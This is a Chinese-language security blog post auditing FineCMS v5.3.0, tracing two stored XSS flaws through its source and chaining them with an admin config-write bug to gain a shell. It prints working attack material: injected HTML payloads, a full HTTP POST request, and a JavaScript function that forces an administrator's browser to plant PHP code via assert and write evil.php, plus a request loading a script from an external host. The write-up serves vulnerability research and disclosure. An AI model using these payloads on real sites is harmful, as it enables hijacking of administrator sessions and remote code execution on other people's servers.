兄dei ! 请接住FineCMS的GetShell姿势
0x00 背景
上周,发现了finecms的一些后台的洞,斗哥先从配置文件写入开始分析,然后再结合本篇的存储XSS进行GetShell,本篇分析下存储XSS的问题,最终通过这两类洞的组合利用GetShell,期待与师傅们的交流讨论。
0x01 审计过程
0x00 相关环境
源码信息:FineCMS v5.3.0 bulid 20180206 问题文件: finecmsfinecmssystemcoreLog.php 漏洞类型:存储型XSS 站点地址:http://www.finecms.net/
0x01 漏洞分析
在finecmsfinecmssystemcoreLog.php文件中的第170-237行中,发现write_log方法,通过分析代码发现传入的$msg变量在传递到fwrite方法中的过程没有经过安全处理,直接写到文件中,可能存在文件写入的问题。
通过寻找write_log方法被调用的位置,在finecmsfinecmssystemcoreCommon.php文件中的第469行中发现被调用的位置。
寻找log_message方法被调用的位置,发现log_message被调用的位置很多,现在以如下文件中的代码分析为例,在finecmsfinecmssystemcoreExceptions.php文件中的show_404方法的第135行中的代码调用了log_message。
寻找show_404方法被调用的位置,在finecmsfinecmssystemcoreCodeIgniter.php文件中的第494行发现调用的位置,且传入的数据是$RTR->directory.$class.'/'.$method,通过分析该文件的代码可以知道$class和$method是在传入参数值后在router中未找到相应的文件或方法的值,然后将这些数据进行拼接,通过show_404方法去调用log_message再调用write_log写入到日志文件中,因此存在文件写入问题。
由于此处写入的文件finecmscacheerrorloglog-2018-02-28.php中的PHP代码在exit之后,所以需要在某些操作下才能触发我们写入的PHP代码。
所以此处的漏洞可以有两种用法,一种是写入php代码,然后坐等管理员登录后台进行”某些操作”,从而触发PHP代码,另一只方式是写入前端代码类似<img src=1 onerror=alert(1)> 通过xss,在管理员浏览错误日志的时候直接进行可以触发PHP代码的操作请求,这里可以结合文件本漏洞或其他漏洞进行GetShell,这里的”某些操作”我进行简要的分析并没有发现,如果有师傅发现了请告诉我。
0x02 漏洞复现
例如,进行以下请求http://127.0.0.1/index.php?c=mail&m=test<img+src=1+onerror=alert(1)>&id=1&0.3873487753402759将前端代码写到日志中。
当管理员进入后台访问错误日志的时候就会触发XSS,这里输出的代码分析就不做了,本身就没有编码输出。
然后可以利用这个XSS进行GetShell 首先构造如下ajax。
function csrf_shell()
{
var xmlhttp1=new XMLHttpRequest();
xmlhttp1.open("POST","/admin.php?c=site&m=index",true);
xmlhttp1.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp1.send("ids[]=1&data[1][name]=FineCMS&data[1][domain]=127.0.0.1'=>1).die($_GET['func']($_GET['evil'])//");
var xmlhttp2=new XMLHttpRequest();
xmlhttp2.open("POST","/admin.php?c=site&m=index&func=assert&evil=fwrite(fopen('evil.php', 'w'),'<?php phpinfo();?>')",true);
xmlhttp2.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp2.send("ids[]=1&data[1][name]=FineCMS&data[1][domain]=127.0.0.1'=>1).die($_GET['func']($_GET['evil'])//");
};
csrf_shell();
然后进行如下请求将前端代码写入日志文件中, http://127.0.0.1/index.php?c=mail&m=test<script src=http://xx.xx.xx/evil.js></script>
当管理员查看错误日志的时候就能够GetShell。
1x00 相关环境
源码信息:FineCMS v5.3.0 bulid 20180206 问题文件: finecmsfinecmsdayruicoreM_Controller.php 漏洞类型:存储型XSS 站点地址:http://www.finecms.net/
1x01 漏洞分析
在测试FineCMS的时候,发现留言的时候直接发送html代码,因此可能存在存储xss,通过数据流的跟踪,得知在FineCMS留言板中默认情况下是未对输入的字符进行XSS安全处理的,首先分析下留言内容存入数据库的操作。
分析输入的代码,在finecmsfinecmsdayruicontrollersForm.php文件的第53行,将传入的$data使用new_addc方法进行数据库insert操作,其中$data便是用户提交的可控字符,这里仅需要这么理解即可,因为实际情况数据传递比较复杂。
通过反现跟踪finecmsfinecmsdayruicontrollersForm.php文件中的$data数据,得知是由$this->validate_filter($this->form['field']);得到的。
跟入validate_filter方法,在finecmsfinecmsdayruicoreM_Controller.php文件中的第952行中发现该方法,这里主要看问题代码,这里$field['fieldtype']的值为Ueditor因此得到的值是1,然后在第985行中,当$validate['xss']为1的时候是不会进行XSS的安全检测的。
分析输出的代码,在文件finecmsfinecmsdayruicontrollersadminFcontent.php文件中的第203行中从数据库中获取留言内容。
跟入get_data方法,在finecmsfinecmsdayruimodelsForm_model.php文件中的第375-388行中,找到该方法代码块,可以看到该方法未对取出的数据进行任何处理。
继续回到finecmsfinecmsdayruicontrollersadminFcontent.php文件,然后追踪$data在页面回显的代码位置,在第231行中找到输出的代码块。
跟进field_input方法,在finecmsfinecmsdayruicoreM_Controller.php文件中的第1427行发现代码块。
继续跟进new_field_input方法,在finecmsfinecmsdayruicoreM_Controller.php文件中的第1270行中发现该方法的代码块,通过分析和打印的方式进行测试,在第1414行打印$myfield得到回显的页面,是没有经过编码的,因此存在存储型XSS。
1x02 漏洞复现
在前台留言板中进行如下请求:
POST /index.php?c=form&mid=liuyan HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Referer: http://127.0.0.1/index.php?c=form&mid=liuyan
Connection: close
Upgrade-Insecure-Requests: 1
data%5Btitle%5D=4&code=bgsp&data%5Bneirong%5D=<p>3<br/></p><img//onerror="alert`1`"//src="1">
然后当管理员访问后台的留言信息的时候便会触发XSS,攻击者可以利用存储XSS对后台漏洞进行攻击利用。
0x02 小结
本篇仅列举了两处存储XSS,与上周的后台文件写入问题的漏洞结合利用便可以GetShell。
- malloc函数及用法
- Centos下安装破解confluence6.3的操作记录
- 也谈如何用技术手段引导用户放弃IE 6
- 手把手教你用vue2.0写个弹窗组件
- FluorineFx:视频录制及回放(Flash/AS3环境)
- VB实现半透明或者部分透明窗体
- “automation服务器不能创建对象”错误之解决
- “微信身份证”来了!明年全国推广
- strtol函数 将字符串转换为相应进制的整数
- .net中的认证(authentication)与授权(authorization)
- Linux内核调度分析(进程调度)
- 从MapX到MapXtreme2004[1]-工具选择
- FluorineFx:认证与授权
- Nunit使用心得
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- java序列化和序列化ID的作用
- python函数式编程
- 让Vim打造成强大的IDE,附_vimrc的配置和使用
- python 中面向切面编程AOP和装饰器
- HashMap&ConcurrentHashMap&HashTable
- python中的垃圾回收机制
- python中值传递还是引用传递?
- 基于Docker+Jenkins+Git的集成开发环境搭建
- python 函数的本质理解
- centOS(离线) off-line install docker-ce
- Java 工厂 Simple Factory&Factory&Abstract Factory
- python 性能的优化
- python中列表的常见操作
- Aop 源码解读
- python字典的合并排序添加查询